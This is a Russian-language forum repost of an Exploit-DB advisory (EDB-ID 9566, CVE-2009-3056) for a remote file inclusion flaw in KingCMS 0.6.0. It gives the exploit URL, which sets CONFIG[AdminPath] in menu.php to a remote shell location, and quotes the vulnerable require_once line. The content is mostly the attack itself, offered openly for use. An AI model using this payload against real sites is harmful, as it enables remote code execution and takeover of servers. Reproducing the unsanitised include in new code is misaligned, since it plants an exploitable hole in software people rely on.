Exploit KingCMS 0.6.0 - 'menu.php' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9566
Проверка EDB
  1. Пройдено
Автор
COBRA_21
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-3056
Дата публикации
2009-09-01
Код:
-------------------------------------------------------------------------------------
Kingcms v0.6.0 [menu.php] Remote File Inclusion Vulnerability
-------------------------------------------------------------------------------------
 
Author: CoBRa_21
 
Mail: uyku_cu[at]windowslive[dot]com
 
Script Download: http://sourceforge.net/projects/kingcms/
 
-------------------------------------------------------------------------------------
 
EXPLOÄ°T:
 
http://localhost/[PATH]/include/engine/content/elements/menu.php? CONFIG[AdminPath] =[SHELL]
 
-------------------------------------------------------------------------------------
BUG:

<?
require_once($CONFIG['AdminPath'] . "/include/engine/folder.php");  

# milw0rm.com [2009-09-01]
 
Источник
www.exploit-db.com

Похожие темы